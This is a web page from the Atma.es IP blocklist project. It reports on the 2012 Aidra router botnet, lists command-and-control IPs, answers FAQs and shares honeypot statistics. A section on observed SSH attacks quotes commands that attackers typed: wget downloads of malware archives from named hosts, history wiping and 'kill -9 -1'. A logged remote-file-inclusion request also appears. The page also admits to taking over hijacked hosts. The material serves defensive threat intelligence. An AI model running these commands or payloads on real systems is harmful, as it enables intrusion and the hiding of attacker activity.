Ex.1 Ex.2

 Separador

SPECIAL REPORT:
Back in January, we started detecting a great amount of attacks -mainly Telnet- coming from all sorts of devices like home routers, IPTV set-top boxes, DVDRs, VoIP devices and media centers that had been hijacked by a new malware, named by its primary author "The Aidra bot-net".

Chances are that your desktop antivirus, firewall, etc. will neither detect it nor stop it. Try to keep your net devices off as long as possible, avoid -more than ever- default/empty/trivial passwords and close every port you don't really need.

We want to thank in a special way those few particulars who are answering to our call-for-help, reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.

Newest C&C hosts (5th may):
46.228.205.240
46.105.227.81
46.228.205.240
65.111.164.6
108.166.187.75
149.154.157.31
174.140.171.110
176.31.32.125
176.31.213.55
176.31.220.169
109.236.84.29
209.105.239.234
209.105.239.235
209.105.239.238

Detailed info and samples.

2012 Atma.es, January 26th - May 5th.

Q: How can I disinfect my device?
A: Just reboot it. If for some strong reason you need it up at all times, visit us again: if nobody else has the will to do it, perhaps we will write a cleaning tool.

Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password. Desktop tools such as antivirus, firewall, etc. will not help. They are made for taking care of the device that they are being run in, not your router, IPcam, NAS, TIVO...

Q: How many devices are infected worldwide?
A: It has been said that near 11000 but that's absolutely uncertain, it is only an estimation that somebody made based on a screenshot of a command panel, nothing else. There are already several Aidra botnets and variants and you would need to estimate how many devices have been infected by all of them. On top of that, just remember that a rebooted device will stay clean until a new infection, so the total can vary greatly in a matter of hours.

Q: Is my smartphone or tablet in risk?
A: At the moment, no. Somebody missunderstood our report. We just said that -in theory- Aidra could infect some smartphones, since it can be run under all sorts of CPUs but we have never detected a single one. Actually, Aidra would need to be adjusted to take into account a particular file system, hardware, etc. which has not happened yet. On a side note: both iOS and Android are based on Linux but their internals are quite particular.

Q: What about my desktop computer or laptop?
A: Currently there are not much reasons to worry about Aidra.

Q: Will be Linux unsafe from now on?
A: Not at all. Aidra takes advantage of dumb users/admins who don't care about passwords. You can buy the best safety-box in the world, but if you leave it open...

Q: Is Aidra such a great threat?
A: It depends on a number of things. If Aidra took over yout set-top box, for example, chances are that you will just find Internet slower than usual. But I wouldn't like to have any kind of malware inside my home router because all my data could be trivially stolen.

Q: Which countries are more affected?
A: As said, it is difficult to say even how many infected devices there are. It is in Europe where we are finding most C&C hosts as well as infected devices, mainly in Sweden, Switzerland and The Netherlands. Lots also in India and China and, surprisingly, not as many as expected in the USA and Japan.

 Separador

Mission 

We identify, gather and clasify dangerous IP addresses such as:

The list comes formated as Peerguardian list (other formats) and ready to be used with your blocking program of choice. All you need to do is adding it to your favourite program by using one of the URLs below:

(*) Perhaps not avaliable from some countries, banned IPs or their closest neighbours.

Special thanks to those who have lately helped us by reporting errors in the list: "thajsta", "frisco.chico", "imvgilante2000", "yoshigoto95", "borjanogueiras", "rautamiekka", "gate.wizard", "meistersinger", "fakhir" and "marc.kuehrer".



Documentation 

How-to English & SpanishEspañol/Castellano e Inglés

PDF document  Peerguardian 2 for Windows     PDF document  IPlist/IPblock 0.26 for Linux

Peerblock: just add a new list and paste http://list.iblocklist.com/lists/atma/atma

 

FAQ

How can I use the blacklist/atma deny list?

Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not in that number as far as we know. Thus, you need to configure your blocking program (see above, "how-tos"). While being an easy task in every case, there are no universal instructions valid for all of them. Our list is published in Peerguardian 1 format, which is compatible with nearly all existant programs and human readable "as is". If you are not using a blocking program yet, please go to the downloads section.

Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (comments in the first lines of the list) or giving credit in any other fair way instead. If in doubt, please contact us.

Why should I use this list when my program of choice already comes with some others preconfigured?

Mainly for a reason alone: we do believe that we identify a good deal of them not listed anywhere else before. This is how we try to do it::

  1. We identify most dangerous IPs with our own tools which are not based in any other. They are supposed to be harder to avoid cause attackers don't know how they work, even if they know about their existance at all. More, they can't know where we are lurking because we use dynamic IPs from different ISPs (apart of those who help us by sending logs). In other words, when a threat is detected, the attacker will find its IP published within some days but meanwhile, we will have changed most of the ours, so there will be no use for them in reviewing hundreds of logs or warning other attackers.
  2. We don't add IPs by merging or filtering them from other P2P deny lists. You can find lots of IPs present in many lists, while many others will be listed only here (or on the contrary, missing only here).
  3. We are spanish language speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native english speakers or have very good skills in that language, but it is not that likely that they could understand spanish. That's why they might be detected by us without even knowing how and where it happened.
  4. As for now, we are a small group. If we intend to harvest a large number of attacks we just can not sit and wait for them to appear. Thus, we don't use passive detections but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).

Should I use this list alone or along with some others?

For one thing, the more lists you use, the harder to handle for your computer, which could be a problem if your hardware is old. On the other hand, despite we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often than Atma, being larger or more specialized. Since Atma is a multipurpose list, we do believe that it is suitable for most home and even professional users, specially those using P2P and/or running any kind of server. For your information, its contents as for March of 2010 were as shown:

Threat: IPs/ranges: Threat: IPs/ranges:
Spammer
Malware
Unspecified Threat
SSH Attack
SMTP Port 25 Attack
P2P Malware
P2P Corrupted Packets
Several Threats
Threat For SQL Servers
Port Scan Attack 		20667
14846
10979
5348
4183
2704
2388
1577
688
554 		Proxy Seeker
Threat For Web Servers
Telnet Attack
MS-Terminal Attack
FTP Attack
P2P Unrequested Responses
VNC Attack
Others

Single IPs blocked:
 476
471
234
191
173
112
68
38

88125

Having said that, please note that we don't list IPs:

Also, not every single detected IP is listed. Those who seldom perform malicious actions will not be listed; otherwise, the list would become larger than desired. In other words, surely using extra lists is a good idea.

How does an IP/range get delisted?

All IPs get deleted within 2-5 months, depending on a number of items like the kind of threat and the historical behaviour. Of course, we remove false positives as soon as we get to know about them. As of June of 2010, entries had been in the list since:

IPs/ranges added within: IPs/ranges:
Current month (June)
1-2 months ago (May)
2-3 months ago (April)
3-4 months ago (March)		 40261
21420
21101
213

Will I get rid of antivirus, anty-spyware and firewalls?

Not at all. Using a blocking program along with our list or any other just prevents your computer to contact with some others. That's all. For instance, you still can get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.

Despite already using the Atma list, I am still receiving spam.

Spammers' IPs are targeted by us and included in the list, indeed, and for one reason: those who send spam are very likely to pose some other threats, notably for administrators of servers, forum, blogsm etc. We will never list IPs belonging to the most important providers, like Gmail, Hotmail, Yahoo, etc. Unfortunately, most spam come from accounts of those companies. If you are not satisfied with their own filters and you are using a mail manager, you could try installing a filter in your computer.

Is atma/blacklist a widely used list?

We guess not at all until February of 2010. As a orientative fact, the list had been downloaded more than 5000 times from there in january of 2010. However, currently is avaliable at iblocklist.com which is the most important mirror for blocking lists.

Do you hack?

No, we don't. Nevertheless, we took over a few hijacked hosts for a number of reasons:
* A top agressive and resilient one in that moment.
* Risk of alerting the bad guys prior to the true administrator.
* Big chances of gathering the controllers' IPs and other data about them.

Those were: a Truetel's host in Taiwan (2009), another one belonging to a tasmanian fireguard patrol (2010), an online shop in Poland (2011), several corporate servers (2011) in Spain (still online, see why and further info in spanish) and a few routers and set-top boxes that had been infected by the "Aidra" bot-net (2012).

In Oct. 2011 a number of IPs brought to our attention. Commanded from China, those people use to scan the rest of the world.
Linked to "Proxyfire" Other scanners
66.152.162.116
74.118.194.81
98.130.166.202
173.242.116.69
175.45.25.79
195.58.176.133
202.194.20.239
218.6.19.3
222.208.183.218
222.215.230.175
 4.4.4.4
58.51.95.10
58.218.199.58
58.218.199.147
58.218.199.227
58.218.199.250
59.53.91.9
61.152.144.145
64.90.50.50
64.120.230.132
65.254.34.178
66.152.162.116
74.52.107.130
74.117.63.74
74.206.242.164
74.222.12.98
85.92.157.116
97.74.215.136
112.126.84.92
 121.12.173.166
131.215.141.60
173.201.240.31
173.201.215.167
174.37.48.98
174.37.118.36
174.121.40.29
174.123.109.34
174.140.167.227
184.173.245.52
195.190.31.220
206.188.193.58
207.7.92.6
216.172.174.86
218.83.152.252
218.219.158.195
221.1.220.149
221.192.199.49
221.194.46.176

Note that it is useless to complain or warn someone, since they are not hijacked devices. Apart of other intentions, as a result of their actions many others are wasting time and resources, and that's why we will do our best for disturbing them a little from March on. are glad to see that Proxyfire has been facing some trouble during april:
Screenshots

The other scanners needed to set up at least five spare (until then) sites after april 2012:
173.201.240.31 proxyproxys·com piggmail·com verysurf·com nsegame·com

What do the descriptions mean?

When using a blocking program you will see different kinds of alerts. Those provided from our list fall into three main categories:

Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulneravilities. Same here about operative systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are saying to you that we have detected a SSH attack from that IP but it is very likey they could run other kinds of attacks.

Some items represent quite benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.


Assorted facts

 Some SSH attacks:

Gathering information

w
uptime
id
ls -a
uname -a
cat /proc/cpuifno
ps x
wget
curl -O

After a previous succesful login

rm -rf .bash_history
history -c
w
ps x
ls -a

Attempting to get rid of the honeypot

bash
sh
kill -9 -1
reboot
exit 		  Sending malware to the target

uname -a
passwd
wget http://nasa.undernet.nm.ru/udp.tgz
tar zxvf udp.tgz

Other deliveries came from

dragutrau.clan.su/Trade/army.tar.gz
freewebtown.com/hotzu/py/ryo.tar
prigat.ucoz.com/mangalia.tgz

Attackers don't want us to see what they do

unset HISTFILE HISTSAVE HISTLOG WATCH
HISTFILE=/dev/null

Attempting to run malware

cd /dev/shm
su

Dumb DoS or speed test?

wget http://download.microsoft.com/download/win ... /W2Ksp3.exe

 Some flashy detections:

Statistics of blocking programs downloading blacklist/atma during the first week of December 2009:

Downloads
760
253
112
43
14
7
4
4
2
1

Total
916
253
14
11
 Program/Version
PeerBlock/1.0.0.181
PeerGuardian/2.0
PeerBlock/1.0.0.202
PeerBlock/1.0.0.223
BlockControl/1.6.9
PeerBlock/0.9.2.86
IPblock/0.18
IPblock/0.27
IPblock/0.26
PeerBlock/1.0.0.187

Program
PeerBlock
PeerGuardian
BlockControl
IPblock

Chart Agents/Versions

 During September of 2009 attackers tried to login under 10374 different user names. The most attacked were:

9850
1034
690
431
264
224
208
206
195
190
 root
admin
test
oracle
user
guest
robert
mysql
michael
paul 		  190
177
176
176
168
166
162
154
152
148
 info
postgres
amanda
adam
sales
martin
backup
student
ftpuser
suporte 		  132
130
130
130
126
126
124
120
115
114
 testing
nagios
eric
david
web
tester
john
richard
sarah
sam 		  114
110
107
106
104
102
101
100
100
100
 patrick
bruce
matt
mark
cyrus
teste
marc
webmaster
mail
download

    Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David", Amanda and Martin (common names in both languages).

Bad boys never sleep:

2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20.859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:

Jul 7 19:27:42 (not shown) sshd[28641]: Accepted password for (not shown) from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 (not shown) sshd[12823]: Accepted password for (not shown) from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 (not shown) sshd[8048]: Accepted password for (not shown) from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 (not shown) sshd[28775]: Accepted password for (not shown) from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 (not shown) sshd[31450]: Accepted password for (not shown) from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 (not shown) sshd[8496]: Accepted password for (not shown) from 188.24.255.242 port 30856 ssh2

Wierd ways of figthting cybercrime:

Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment :D


Where on earth are the Honeypots?

After reading the "Cyber Crime Alert" report by the FBI (spring of 2011) it seems that bad guys think that here, in Spain, we run an incredible 69 per cent of the Honeypots in the World and, besides, they use to share the IPs where honeypots are supposed to be. Well, concerning our own IPs, wether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other Honeypot here apart from ours.

A boo for a couple image-hosting places

In sept. 2011 our site suffered a persistent attack from 62.129.242.122, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we got to know that those indonesians were using a few image-sharing sites for their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.

Why does Nokia want to know my email password?

Did you know that when you use the Nokia's email app, you are giving them your address and password, as seen in this blog?. In Nov. 2011 we checked it out by ourselves using a Nokia X3-02 and a gMail account:
Account's activity


Get involved 

1-Use and spread our list

Help us and help others letting them to know about us. You could link us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored in some more sites. If you are willing to setup one, please contact us.

2-Sending your logs to us

We have developed some automathic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Reporting assosrted IPs/ranges

If you know how to identify them in a particular context you could report them to us.

4-Run a "honey pot"

You can think of a "honey pot " as a disguise that can turn your local net or computer into an absolutely different thing when seen from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!

5-Warn us about false positives, changed IPs, etc.

Sometimes we may be wrong and add some innocent IP to the list. But that is not the only one issue we have to face; for instance, we need to remove old entries when they have turned safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.

6-Contribute

We make no money of this. If you feel that you could donate a few or you've got some hardware you don't need, please contact us.

7-Special request for english speakers

As said, English is not our first language. We would like you to help us by warning us about typos, wierd expressions, etc.


Links 

MS Windows Blocking programs for Microsoft Windows

PeerBlock   PeerGuardian   ProtoWall (not open source)   OutPost Pro (not free)   BeeThink IP blocker (not free)

Linux Blocking programs for Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock    EisFair-BFB

Linux Blocking programs for Mac-OS

PeerGuardian

If you know about any other not listed here, please tell us.

Linux Third part sources

In our list we add the newest threats detected by other trustworthy sources to whom we are in debt:

Amos.TwilightParadox.com    Antispam.Andreotti.nl*    Antivirus.neu.edu.cn    Autoshun.org*    Bizimbal.com    Blackip.ustc.edu.cn    Blocklist.de    Boston.comites-it.org    BotHunter.net    Cert.ntnu.edu.tw    Charles.the-haleys.org    CheekyFreebies.com    Check.Torproject.org    Chriskujawski.com    Clean-mx.de*    Cyber-ta.org    Cs.Rutgers.edu    c64.gotdns.org    Daiwa-comp.co.jp    Danger.rulez.sk    Darrenpopham.com    DnsBL.Abuse.ch*    Doetut.xs4all.nl*    Dougnichols.org    Dynastop.tanaya.net    Dr-data.net    Elfagr.net    Escrow-fraud.com    Elite-proxies.blogspot.com    Elizabeth.czn.cz    EmergingThreats.net    Forum.emule-project.net    Emule-security.net    Esdevagrafica.com.br    EvilDayStar.net    FantasyForeverCreations.com    Files.sabmx.net    ForumPostersUnion.com    FreeHairSecrets.com    Fugitif.DynDns.org    Furniture.co.ua    GabyyHackerTeam    Galf.org    Gamble-Irwin-Group.com    Genendesign.com    Gw.Paraibuna.com.br    Hackedreport.com    Heise.de    Iantighe.com    IPillion.com    Jainvestigation.com    JayScott.co.uk    Juniper.net    Kish-telecom.com    Mail.HogarDeCristo.org.ec    Malc0de.com    MaliciousNetworks.org*    MalwareDomainList.com* MalwarePatrol.net    MalwareURL.com    MarSolucionesFinancieras.com    Meganfath.com    Merlot.com    Mtc.sri.com    MyIPtest.com    MyWot.com/wiki    NeilGunton.com    Nethavoc.net    NetSecDB.de    Noamu.com    Outten.co.uk    Paradoxi.exisoft.nl    Pellegrinilab.org    PrairieHomeOutfitters.com    Progressiverehabmuskego.com    ProjectHoneyPot.org*    ProSouthRealty.com    Puaga.com    Rblhu.net*    RootKitKiller.com    Rynearson.com    Sans.org*    Sblam.com    SB-innovation.de    SecurityNewsPortal.com    Senderbase.org    Semeliker.net    Shinshu.fm    Slyparadox.com    Snortattack.org    Spam-ip.com    Summeracademy-lans.com    sshBL.org*    Stats.denyhosts.net    StopForumSpam.com    Sudosecure.net    Tcc.edu.tw    Thalamus.no-ip.com    TheHackedReport.com    Threatexpert.com    Trustedsource.org    Twitter.com/bannedIPs    Twitter.com/hashza    Twitter.com/HoneyPoint*    Twitter.com/olaf_j*    Uceprotect.net    Unusualdischarge.com    Ustc.edu.cn    VillagePlayers.org    VirtualSupplyNet.com    Vitapatent.com    Websworld.org    Xml.SsdSandBox.net    192.192.205.93   

Note: when you perform a IP/range query, results may include not a generic label but some of the sources labelled with * instead.

Please, note that that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you could find IPs that are listed in some of them but missing in the Atma deny list.


Contact 

Visit our Google group (spanish only) or send us an email

 Separador

© 2008-2012 Atma.es | Privacy | Legal notice | Original logo from Ocal | Valid HTML and CSS | Web of Trust record | Designed by Expressmedia.es